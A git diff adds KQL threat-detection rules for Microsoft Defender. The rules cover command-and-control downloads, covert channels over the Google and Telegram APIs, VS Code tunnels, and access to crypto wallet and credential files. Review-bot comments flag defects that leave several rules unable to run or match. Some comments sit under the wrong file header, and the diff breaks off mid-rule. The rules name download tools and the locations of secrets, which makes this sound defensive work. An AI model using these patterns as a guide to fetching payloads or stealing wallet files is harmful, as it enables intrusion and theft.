+++ b/KQL/rules/Command and Control/suspicious_extrac32_execution.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Extrac32 Execution
+// Author: frack113
+// Date: 2021-11-26
+// Level: medium
+// Description: Download or Copy file with Extrac32
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1105
+
+DeviceProcessEvents
+| where ProcessCommandLine contains ".cab" and (ProcessCommandLine contains "extrac32.exe" or FolderPath endswith "\\extrac32.exe" or ProcessVersionInfoOriginalFileName =~ "extrac32.exe") and (ProcessCommandLine contains "/C" or ProcessCommandLine contains "/Y" or ProcessCommandLine contains " \\\\")
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/suspicious_frombase64string_usage_on_gzip_archive_process_creation.kql b/KQL/rules/Command and Control/suspicious_frombase64string_usage_on_gzip_archive_process_creation.kql
new file mode 100644
index 00000000..675095d1
--- /dev/null
+++ b/KQL/rules/Command and Control/suspicious_frombase64string_usage_on_gzip_archive_process_creation.kql
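Review bot: In the Dropbox rule, the exclusion `not(InitiatingProcessFolderPath contains "\\Dropbox")` is much wider than "the Dropbox client": a user's synced folder is itself named `\Dropbox\`, so any executable run from inside a synced folder — a common delivery location for malware that then talks to the Dropbox API for C2 — is excluded along with the client. Narrow it to the client's install locations, e.g. `not(InitiatingProcessFolderPath contains "\\Program Files\\Dropbox\\" or InitiatingProcessFolderPath contains "\\Program Files (x86)\\Dropbox\\" or InitiatingProcessFolderPath contains "\\AppData\\Local\\Dropbox\\")`, adjusting to the paths actually observed in the environment. A one-line comment that this rule is for high-value non-client traffic and that the Dropbox client is excluded by install path, not by name, would stop the next tuner from re-widening it.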
@@ -0,0 +1,12 @@
+// Title: Suspicious FromBase64String Usage On Gzip Archive - Process Creation
+// Author: frack113
+// Date: 2022-12-23
+// Level: medium
+// Description: Detects attempts of decoding a base64 Gzip archive via PowerShell. This technique is often used as a method to load malicious content into memory afterward.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1132.001
+// False Positives:
+// - Legitimate administrative script
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "FromBase64String" and ProcessCommandLine contains "MemoryStream" and ProcessCommandLine contains "H4sI"
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/suspicious_invoke_webrequest_execution.kql b/KQL/rules/Command and Control/suspicious_invoke_webrequest_execution.kql
new file mode 100644
index 00000000..d94a68cc
--- /dev/null
+++ b/KQL/rules/Command and Control/suspicious_invoke_webrequest_execution.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Invoke-WebRequest Execution
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-02
+// Level: high
+// Description: Detects a suspicious call to Invoke-WebRequest cmdlet where the and output is located in a suspicious location
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1105
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "curl " or ProcessCommandLine contains "Invoke-WebRequest" or ProcessCommandLine contains "iwr " or ProcessCommandLine contains "wget ") and (ProcessCommandLine contains " -ur" or ProcessCommandLine contains " -o") and ((FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("powershell_ise.EXE", "PowerShell.EXE", "pwsh.dll"))) and (ProcessCommandLine contains "\\AppData\\" or ProcessCommandLine contains "\\Desktop\\" or ProcessCommandLine contains "\\Temp\\" or ProcessCommandLine contains "\\Users\\Public\\" or ProcessCommandLine contains "%AppData%" or ProcessCommandLine contains "%Public%" or ProcessCommandLine contains "%Temp%" or ProcessCommandLine contains "%tmp%" or ProcessCommandLine contains ":\\Windows\\")
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/suspicious_invoke_webrequest_execution_with_directip.kql b/KQL/rules/Command and Control/suspicious_invoke_webrequest_execution_with_directip.kql
new file mode 100644
index 00000000..4ab6508c
--- /dev/null
+++ b/KQL/rules/Command and Control/suspicious_invoke_webrequest_execution_with_directip.kql
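Review bot: The location clause `ProcessCommandLine contains ":\\Windows\\"` is satisfied whenever PowerShell is launched by its full path (`C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ...` is part of ProcessCommandLine), so for those launches this high-level rule reduces to "a download cmdlet plus a `-o`/`-ur` fragment" with no suspicious output location at all; and `" -o"` on its own also matches parameters such as `-Online`. Consider narrowing the last entry to `":\\Windows\\Temp\\"` (or testing the output path rather than the whole command line) and anchoring the switch as `" -outfile"` / `" -o "`. The description "where the and output is located" has a stray word; "where the output file is written to a suspicious location" is what the query checks.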
@@ -0,0 +1,10 @@
+// Title: Suspicious Invoke-WebRequest Execution With DirectIP
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-04-21
+// Level: medium
+// Description: Detects calls to PowerShell with Invoke-WebRequest cmdlet using direct IP access
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1105
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "curl " or ProcessCommandLine contains "Invoke-RestMethod" or ProcessCommandLine contains "Invoke-WebRequest" or ProcessCommandLine contains " irm " or ProcessCommandLine contains "iwr " or ProcessCommandLine contains "wget ") and ((FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("powershell_ise.EXE", "PowerShell.EXE", "pwsh.dll"))) and (ProcessCommandLine contains "://1" or ProcessCommandLine contains "://2" or ProcessCommandLine contains "://3" or ProcessCommandLine contains "://4" or ProcessCommandLine contains "://5" or ProcessCommandLine contains "://6" or ProcessCommandLine contains "://7" or ProcessCommandLine contains "://8" or ProcessCommandLine contains "://9")
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/suspicious_mstsc_exe_execution_with_local_rdp_file.kql b/KQL/rules/Command and Control/suspicious_mstsc_exe_execution_with_local_rdp_file.kql
new file mode 100644
index 00000000..d7490876
--- /dev/null
+++ b/KQL/rules/Command and Control/suspicious_mstsc_exe_execution_with_local_rdp_file.kql
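Review bot: The `"://1"` … `"://9"` fragments match any URL whose host begins with a digit, which includes ordinary host names such as `1drv.ms` or `2fa.example.com`, not only literal IPs, and `"://1"` also catches every internal 10.x/172.x address that admin scripts routinely hit, so the rule is both noisier and looser than its title. A regex pins the intent in one clause: `ProcessCommandLine matches regex @"://(\d{1,3}\.){3}\d{1,3}"`. Minor inconsistency: `" irm "` is anchored with a leading space while `"iwr "`, `"curl "` and `"wget "` are not; pick one convention for all four aliases.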
@@ -0,0 +1,12 @@
+// Title: Suspicious Mstsc.EXE Execution With Local RDP File
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-04-18
+// Level: high
+// Description: Detects potential RDP connection via Mstsc using a local ".rdp" file located in suspicious locations.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1219.002
+// False Positives:
+// - Likelihood is related to how often the paths are used in the environment
+
+DeviceProcessEvents
+| where (ProcessCommandLine endswith ".rdp" or ProcessCommandLine endswith ".rdp\"") and (FolderPath endswith "\\mstsc.exe" or ProcessVersionInfoOriginalFileName =~ "mstsc.exe") and (ProcessCommandLine contains ":\\Users\\Public\\" or ProcessCommandLine contains ":\\Windows\\System32\\spool\\drivers\\color" or ProcessCommandLine contains ":\\Windows\\System32\\Tasks_Migrated " or ProcessCommandLine contains ":\\Windows\\Tasks\\" or ProcessCommandLine contains ":\\Windows\\Temp\\" or ProcessCommandLine contains ":\\Windows\\Tracing\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp\\" or ProcessCommandLine contains "\\Downloads\\")
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/suspicious_non_browser_network_communication_with_google_api.kql b/KQL/rules/Command and Control/suspicious_non_browser_network_communication_with_google_api.kql
new file mode 100644
index 00000000..8bfd93fa
--- /dev/null
+++ b/KQL/rules/Command and Control/suspicious_non_browser_network_communication_with_google_api.kql
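Review bot: The entry `":\\Windows\\System32\\Tasks_Migrated "` ends in a space rather than a backslash, so a file at `C:\Windows\System32\Tasks_Migrated\x.rdp` never matches it; every other directory in the list ends in `\\`, which makes the space look like a transcription slip carried over from the upstream rule. Change it to `":\\Windows\\System32\\Tasks_Migrated\\"` (and, if the upstream rule is the source of the space, report it there as well). The `spool\\drivers\\color` entry is also missing its trailing `\\`, though there it is harmless since the directory name is unlikely to be a prefix of another path.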
@@ -0,0 +1,13 @@
+// Title: Suspicious Non-Browser Network Communication With Google API
+// Author: Gavin Knapp
+// Date: 2023-05-01
+// Level: medium
+// Description: Detects a non-browser process interacting with the Google API which could indicate the use of a covert C2 such as Google Sheet C2 (GC2-sheet)
+
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1102
+// False Positives:
+// - Legitimate applications communicating with the "googleapis.com" endpoints that are not already in the exclusion list. This is environmental dependent and requires further testing and tuning.
+
+DeviceNetworkEvents
+| where (RemoteUrl contains "drive.googleapis.com" or RemoteUrl contains "oauth2.googleapis.com" or RemoteUrl contains "sheets.googleapis.com" or RemoteUrl contains "www.googleapis.com") and (not((InitiatingProcessFolderPath =~ "" or isnull(InitiatingProcessFolderPath)))) and (not((InitiatingProcessFolderPath endswith "\\brave.exe" or (InitiatingProcessFolderPath endswith ":\\Program Files\\Google\\Chrome\\Application\\chrome.exe" or InitiatingProcessFolderPath endswith ":\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe") or (InitiatingProcessFolderPath contains ":\\Program Files (x86)\\Microsoft\\EdgeWebView\\Application\\" or (InitiatingProcessFolderPath endswith ":\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe" or InitiatingProcessFolderPath endswith ":\\Program Files\\Microsoft\\Edge\\Application\\msedge.exe" or InitiatingProcessFolderPath endswith "\\WindowsApps\\MicrosoftEdge.exe")) or ((InitiatingProcessFolderPath contains ":\\Program Files (x86)\\Microsoft\\EdgeCore\\" or InitiatingProcessFolderPath contains ":\\Program Files\\Microsoft\\EdgeCore\\") and (InitiatingProcessFolderPath endswith "\\msedge.exe" or InitiatingProcessFolderPath endswith "\\msedgewebview2.exe")) or (InitiatingProcessFolderPath endswith ":\\Program Files\\Mozilla Firefox\\firefox.exe" or InitiatingProcessFolderPath endswith ":\\Program Files (x86)\\Mozilla Firefox\\firefox.exe") or (InitiatingProcessFolderPath contains ":\\Program Files\\Google\\Drive File Stream\\" and InitiatingProcessFolderPath endswith "\\GoogleDriveFS.exe") or InitiatingProcessFolderPath endswith "\\GoogleUpdate.exe" or (InitiatingProcessFolderPath endswith ":\\Program Files (x86)\\Internet Explorer\\iexplore.exe" or InitiatingProcessFolderPath endswith ":\\Program Files\\Internet Explorer\\iexplore.exe") or InitiatingProcessFolderPath endswith "\\maxthon.exe" or InitiatingProcessFolderPath endswith "\\opera.exe" or InitiatingProcessFolderPath endswith "\\outlook.exe" or InitiatingProcessFolderPath endswith "\\safari.exe" or InitiatingProcessFolderPath endswith "\\seamonkey.exe" or InitiatingProcessFolderPath endswith "\\vivaldi.exe" or InitiatingProcessFolderPath endswith "\\whale.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/suspicious_non_browser_network_communication_with_telegram_api.kql b/KQL/rules/Command and Control/suspicious_non_browser_network_communication_with_telegram_api.kql
new file mode 100644
index 00000000..9eeb953e
--- /dev/null
+++ b/KQL/rules/Command and Control/suspicious_non_browser_network_communication_with_telegram_api.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious Non-Browser Network Communication With Telegram API
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-19
+// Level: medium
+// Description: Detects an a non-browser process interacting with the Telegram API which could indicate use of a covert C2
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.exfiltration, attack.t1102, attack.t1567, attack.t1105
+// False Positives:
+// - Legitimate applications communicating with the Telegram API e.g. web browsers not in the exclusion list, app with an RSS etc.
+
+DeviceNetworkEvents
+| where RemoteUrl contains "api.telegram.org" and (not((InitiatingProcessFolderPath endswith "\\brave.exe" or (InitiatingProcessFolderPath in~ ("C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe", "C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe")) or (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft\\EdgeWebView\\Application\\" or InitiatingProcessFolderPath endswith "\\WindowsApps\\MicrosoftEdge.exe" or (InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe", "C:\\Program Files\\Microsoft\\Edge\\Application\\msedge.exe"))) or ((InitiatingProcessFolderPath endswith "\\msedge.exe" or InitiatingProcessFolderPath endswith "\\msedgewebview2.exe") and (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft\\EdgeCore\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft\\EdgeCore\\")) or (InitiatingProcessFolderPath in~ ("C:\\Program Files\\Mozilla Firefox\\firefox.exe", "C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe")) or (InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "C:\\Program Files\\Internet Explorer\\iexplore.exe")) or InitiatingProcessFolderPath endswith "\\maxthon.exe" or InitiatingProcessFolderPath endswith "\\opera.exe" or InitiatingProcessFolderPath endswith "\\safari.exe" or InitiatingProcessFolderPath endswith "\\seamonkey.exe" or InitiatingProcessFolderPath endswith "\\vivaldi.exe" or InitiatingProcessFolderPath endswith "\\whale.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/suspicious_plink_port_forwarding.kql b/KQL/rules/Command and Control/suspicious_plink_port_forwarding.kql
new file mode 100644
index 00000000..9930d2d0
--- /dev/null
+++ b/KQL/rules/Command and Control/suspicious_plink_port_forwarding.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious Plink Port Forwarding
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-01-19
+// Level: high
+// Description: Detects suspicious Plink tunnel port forwarding to a local port
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1572, attack.lateral-movement, attack.t1021.001
+// False Positives:
+// - Administrative activity using a remote port forwarding to a local port
+
+DeviceProcessEvents
+| where ProcessCommandLine contains " -R " and ProcessVersionInfoFileDescription =~ "Command-line SSH, Telnet, and Rlogin client"
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/suspicious_tscon_start_as_system.kql b/KQL/rules/Command and Control/suspicious_tscon_start_as_system.kql
new file mode 100644
index 00000000..ec8162c5
--- /dev/null
+++ b/KQL/rules/Command and Control/suspicious_tscon_start_as_system.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious TSCON Start as SYSTEM
+// Author: Florian Roth (Nextron Systems)
+// Date: 2018-03-17
+// Level: high
+// Description: Detects a tscon.exe start as LOCAL SYSTEM
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1219.002
+
+DeviceProcessEvents
+| where FolderPath endswith "\\tscon.exe" and (AccountName contains "AUTHORI" or AccountName contains "AUTORI")
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/suspicious_velociraptor_child_process.kql b/KQL/rules/Command and Control/suspicious_velociraptor_child_process.kql
new file mode 100644
index 00000000..235b6f08
--- /dev/null
+++ b/KQL/rules/Command and Control/suspicious_velociraptor_child_process.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious Velociraptor Child Process
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-08-29
+// Level: high
+// Description: Detects the suspicious use of the Velociraptor DFIR tool to execute other tools or download additional payloads, as seen in a campaign where it was abused for remote access and to stage further attacks.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.persistence, attack.defense-evasion, attack.t1219
+// False Positives:
+// - Legitimate administrators or incident responders might use Velociraptor to execute scripts or tools. However, the combination of Velociraptor spawning these specific processes with these command lines is suspicious. Tuning may be required to exclude known administrative actions or specific scripts.
+
+DeviceProcessEvents
+| where InitiatingProcessFolderPath endswith "\\Velociraptor.exe" and ((ProcessCommandLine contains "msiexec" and ProcessCommandLine contains "/i" and ProcessCommandLine contains "http") or ((ProcessCommandLine contains "Invoke-WebRequest " or ProcessCommandLine contains "IWR " or ProcessCommandLine contains ".DownloadFile" or ProcessCommandLine contains ".DownloadString") and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\pwsh.exe")) or (ProcessCommandLine contains "code.exe" and ProcessCommandLine contains "tunnel" and ProcessCommandLine contains "--accept-server-license-terms"))
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/teamviewer_remote_session.kql b/KQL/rules/Command and Control/teamviewer_remote_session.kql
new file mode 100644
index 00000000..74ae312f
--- /dev/null
+++ b/KQL/rules/Command and Control/teamviewer_remote_session.kql
@@ -0,0 +1,12 @@
+// Title: TeamViewer Remote Session
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-01-30
+// Level: medium
+// Description: Detects the creation of log files during a TeamViewer remote session
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1219.002
+// False Positives:
+// - Legitimate uses of TeamViewer in an organisation
+
+DeviceFileEvents
+| where (FolderPath endswith "\\TeamViewer\\RemotePrinting\\tvprint.db" or FolderPath endswith "\\TeamViewer\\TVNetwork.log") or (FolderPath contains "\\TeamViewer" and FolderPath contains "_Logfile.log")
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/tor_client_browser_execution.kql b/KQL/rules/Command and Control/tor_client_browser_execution.kql
new file mode 100644
index 00000000..bfc1c1fd
--- /dev/null
+++ b/KQL/rules/Command and Control/tor_client_browser_execution.kql
@@ -0,0 +1,10 @@
+// Title: Tor Client/Browser Execution
+// Author: frack113
+// Date: 2022-02-20
+// Level: high
+// Description: Detects the use of Tor or Tor-Browser to connect to onion routing networks
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1090.003
+
+DeviceProcessEvents
+| where FolderPath endswith "\\tor.exe" or FolderPath endswith "\\Tor Browser\\Browser\\firefox.exe"
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/uncommon_network_connection_initiated_by_certutil_exe.kql b/KQL/rules/Command and Control/uncommon_network_connection_initiated_by_certutil_exe.kql
new file mode 100644
index 00000000..b8ab8d3a
--- /dev/null
+++ b/KQL/rules/Command and Control/uncommon_network_connection_initiated_by_certutil_exe.kql
@@ -0,0 +1,12 @@
+// Title: Uncommon Network Connection Initiated By Certutil.EXE
+// Author: frack113, Florian Roth (Nextron Systems)
+// Date: 2022-09-02
+// Level: high
+// Description: Detects a network connection initiated by the certutil.exe utility.
+Attackers can abuse the utility in order to download malware or additional payloads.
+
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1105
+
+DeviceNetworkEvents
+| where (RemotePort in~ ("80", "135", "443", "445")) and InitiatingProcessFolderPath endswith "\\certutil.exe"
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/use_of_ultravnc_remote_access_software.kql b/KQL/rules/Command and Control/use_of_ultravnc_remote_access_software.kql
new file mode 100644
index 00000000..073def73
--- /dev/null
+++ b/KQL/rules/Command and Control/use_of_ultravnc_remote_access_software.kql
@@ -0,0 +1,12 @@
+// Title: Use of UltraVNC Remote Access Software
+// Author: frack113
+// Date: 2022-10-02
+// Level: medium
+// Description: An adversary may use legitimate desktop support and remote access software,to establish an interactive command and control channel to target systems within networks
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1219.002
+// False Positives:
+// - Legitimate use
+
+DeviceProcessEvents
+| where ProcessVersionInfoFileDescription =~ "VNCViewer" or ProcessVersionInfoProductName =~ "UltraVNC VNCViewer" or ProcessVersionInfoCompanyName =~ "UltraVNC" or ProcessVersionInfoOriginalFileName =~ "VNCViewer.exe"
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/visual_studio_code_tunnel_execution.kql b/KQL/rules/Command and Control/visual_studio_code_tunnel_execution.kql
new file mode 100644
index 00000000..0b3c798a
--- /dev/null
+++ b/KQL/rules/Command and Control/visual_studio_code_tunnel_execution.kql
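Review bot: `RemotePort in~ ("80", "135", "443", "445")` compares the numeric `RemotePort` column against string literals with a string operator, which in advanced hunting will either fail to compile or never match; the line should read `| where RemotePort in (80, 135, 443, 445) and InitiatingProcessFolderPath endswith "\\certutil.exe"`. Separately, the second sentence of the description is emitted as a bare `Attackers can abuse the utility ...` line with no `//` prefix, leaving non-comment text before the query that cannot parse as KQL; the same defect appears in the Crypto Currency Wallets, Windows Credential History File, DPAPI Master Keys and Credential Manager rules later in this commit, so the fix belongs in the converter's handling of multi-line Sigma descriptions (prefix every continuation line with `// `). Until that is fixed, none of these files is a runnable query.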
@@ -0,0 +1,12 @@
+// Title: Visual Studio Code Tunnel Execution
+// Author: Nasreddine Bencherchali (Nextron Systems), citron_ninja
+// Date: 2023-10-25
+// Level: medium
+// Description: Detects Visual Studio Code tunnel execution. Attackers can abuse this functionality to establish a C2 channel
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1071.001, attack.t1219
+// False Positives:
+// - Legitimate use of Visual Studio Code tunnel
+
+DeviceProcessEvents
+| where (ProcessCommandLine endswith ".exe tunnel" and isnull(ProcessVersionInfoOriginalFileName)) or ((ProcessCommandLine contains "/d /c " and ProcessCommandLine contains "\\servers\\Stable-" and ProcessCommandLine contains "code-server.cmd") and FolderPath endswith "\\cmd.exe" and InitiatingProcessCommandLine endswith " tunnel") or (ProcessCommandLine contains ".exe tunnel" and ProcessCommandLine contains "--accept-server-license-terms")
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/visual_studio_code_tunnel_remote_file_creation.kql b/KQL/rules/Command and Control/visual_studio_code_tunnel_remote_file_creation.kql
new file mode 100644
index 00000000..d19487f5
--- /dev/null
+++ b/KQL/rules/Command and Control/visual_studio_code_tunnel_remote_file_creation.kql
@@ -0,0 +1,11 @@
+// Title: Visual Studio Code Tunnel Remote File Creation
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-10-25
+// Level: medium
+// Description: Detects the creation of file by the "node.exe" process in the ".vscode-server" directory. Could be a sign of remote file creation via VsCode tunnel feature
+
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control
+
+DeviceFileEvents
+| where InitiatingProcessFolderPath contains "\\servers\\Stable-" and InitiatingProcessFolderPath endswith "\\server\\node.exe" and FolderPath contains "\\.vscode-server\\data\\User\\History\\"
\ No newline at end of file
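Review bot: The first alternative depends on `isnull(ProcessVersionInfoOriginalFileName)`, but string columns in advanced hunting are, as far as I can tell, empty strings rather than null when version info is absent, so that branch is unlikely ever to fire; the Google API rule in this same commit guards the identical case with `=~ "" or isnull(...)`. Using `isempty(ProcessVersionInfoOriginalFileName)` covers both representations in one call and keeps the two rules consistent. This is probably a Sigma `null` mapping in the converter, so the other rules it produced may carry the same pattern.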
diff --git a/KQL/rules/Command and Control/visual_studio_code_tunnel_service_installation.kql b/KQL/rules/Command and Control/visual_studio_code_tunnel_service_installation.kql
new file mode 100644
index 00000000..58a39f23
--- /dev/null
+++ b/KQL/rules/Command and Control/visual_studio_code_tunnel_service_installation.kql
@@ -0,0 +1,12 @@
+// Title: Visual Studio Code Tunnel Service Installation
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-10-25
+// Level: medium
+// Description: Detects the installation of VsCode tunnel (code-tunnel) as a service.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1071.001
+// False Positives:
+// - Legitimate installation of code-tunnel as a service
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "tunnel " and ProcessCommandLine contains "service" and ProcessCommandLine contains "internal-run" and ProcessCommandLine contains "tunnel-service.log"
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/visual_studio_code_tunnel_shell_execution.kql b/KQL/rules/Command and Control/visual_studio_code_tunnel_shell_execution.kql
new file mode 100644
index 00000000..9174c8fe
--- /dev/null
+++ b/KQL/rules/Command and Control/visual_studio_code_tunnel_shell_execution.kql
@@ -0,0 +1,12 @@
+// Title: Visual Studio Code Tunnel Shell Execution
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-10-25
+// Level: medium
+// Description: Detects the execution of a shell (powershell, bash, wsl...) via Visual Studio Code tunnel. Attackers can abuse this functionality to establish a C2 channel and execute arbitrary commands on the system.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1071.001
+// False Positives:
+// - Legitimate use of Visual Studio Code tunnel and running code from there
+
+DeviceProcessEvents
+| where (InitiatingProcessCommandLine contains ".vscode-server" and InitiatingProcessFolderPath contains "\\servers\\Stable-" and InitiatingProcessFolderPath endswith "\\server\\node.exe") and ((ProcessCommandLine contains "\\terminal\\browser\\media\\shellIntegration.ps1" and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe")) or (FolderPath endswith "\\wsl.exe" or FolderPath endswith "\\bash.exe"))
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/wget_creating_files_in_tmp_directory.kql b/KQL/rules/Command and Control/wget_creating_files_in_tmp_directory.kql
new file mode 100644
index 00000000..b494b440
--- /dev/null
+++ b/KQL/rules/Command and Control/wget_creating_files_in_tmp_directory.kql
@@ -0,0 +1,12 @@
+// Title: Wget Creating Files in Tmp Directory
+// Author: Joseliyo Sanchez, @Joseliyo_Jstnk
+// Date: 2023-06-02
+// Level: medium
+// Description: Detects the use of wget to download content in a temporary directory such as "/tmp" or "/var/tmp"
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1105
+// False Positives:
+// - Legitimate downloads of files in the tmp folder.
+
+DeviceFileEvents
+| where InitiatingProcessFolderPath endswith "/wget" and (FolderPath startswith "/tmp/" or FolderPath startswith "/var/tmp/")
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/access_to_crypto_currency_wallets_by_uncommon_applications.kql b/KQL/rules/Credential Access/access_to_crypto_currency_wallets_by_uncommon_applications.kql
new file mode 100644
index 00000000..eb039042
--- /dev/null
+++ b/KQL/rules/Credential Access/access_to_crypto_currency_wallets_by_uncommon_applications.kql
@@ -0,0 +1,17 @@
+// Title: Access To Crypto Currency Wallets By Uncommon Applications
+// Author: X__Junior (Nextron Systems)
+// Date: 2024-07-29
+// Level: medium
+// Description: Detects file access requests to crypto currency files by uncommon processes.
+Could indicate potential attempt of crypto currency wallet stealing.
+
+// MITRE Tactic: Credential Access
+// Tags: attack.t1003, attack.credential-access
+// False Positives:
+// - Antivirus, Anti-Spyware, Anti-Malware Software
+// - Backup software
+// - Legitimate software installed on partitions other than "C:\"
+// - Searching software such as "everything.exe"
+
+DeviceFileEvents
+| where ((FileName contains "\\AppData\\Roaming\\Ethereum\\keystore\\" or FileName contains "\\AppData\\Roaming\\EthereumClassic\\keystore\\" or FileName contains "\\AppData\\Roaming\\monero\\wallets\\") or (FileName endswith "\\AppData\\Roaming\\Bitcoin\\wallet.dat" or FileName endswith "\\AppData\\Roaming\\BitcoinABC\\wallet.dat" or FileName endswith "\\AppData\\Roaming\\BitcoinSV\\wallet.dat" or FileName endswith "\\AppData\\Roaming\\DashCore\\wallet.dat" or FileName endswith "\\AppData\\Roaming\\DogeCoin\\wallet.dat" or FileName endswith "\\AppData\\Roaming\\Litecoin\\wallet.dat" or FileName endswith "\\AppData\\Roaming\\Ripple\\wallet.dat" or FileName endswith "\\AppData\\Roaming\\Zcash\\wallet.dat")) and (not(((InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\system32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\") or InitiatingProcessFolderPath =~ "System"))) and (not(((InitiatingProcessFolderPath endswith "\\MpCopyAccelerator.exe" or InitiatingProcessFolderPath endswith "\\MsMpEng.exe") and InitiatingProcessFolderPath startswith "C:\\ProgramData\\Microsoft\\Windows Defender\\")))
\ No newline at end of file
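Review bot: Every path pattern here is applied to `FileName` (`FileName contains "\\AppData\\Roaming\\Ethereum\\keystore\\"`, `FileName endswith "\\AppData\\Roaming\\Bitcoin\\wallet.dat"`), but in `DeviceFileEvents` that column carries only the leaf file name and the full path is in `FolderPath`, which is what the TeamViewer and Cred Dump Tools rules in this commit correctly use; as written none of these conditions can match, so the rule is silently dead. The Sysvol Files, Windows Credential History File, DPAPI Master Keys and Credential Manager rules map `TargetFilename` the same way and need the same `FileName` → `FolderPath` change, presumably in the converter's field mapping. Note also that the upstream rules are file-access rules while `DeviceFileEvents`, as far as I know, records create/modify/delete/rename actions rather than reads, so even after the field fix the coverage is narrower than the Description states; a header line such as `// Note: MDE DeviceFileEvents does not record file reads; this only fires on create/modify` would keep analysts from over-trusting it.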
diff --git a/KQL/rules/Credential Access/access_to_potentially_sensitive_sysvol_files_by_uncommon_applications.kql b/KQL/rules/Credential Access/access_to_potentially_sensitive_sysvol_files_by_uncommon_applications.kql
new file mode 100644
index 00000000..a1a05860
--- /dev/null
+++ b/KQL/rules/Credential Access/access_to_potentially_sensitive_sysvol_files_by_uncommon_applications.kql
@@ -0,0 +1,10 @@
+// Title: Access To Potentially Sensitive Sysvol Files By Uncommon Applications
+// Author: frack113
+// Date: 2023-12-21
+// Level: medium
+// Description: Detects file access requests to potentially sensitive files hosted on the Windows Sysvol share.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1552.006
+
+DeviceFileEvents
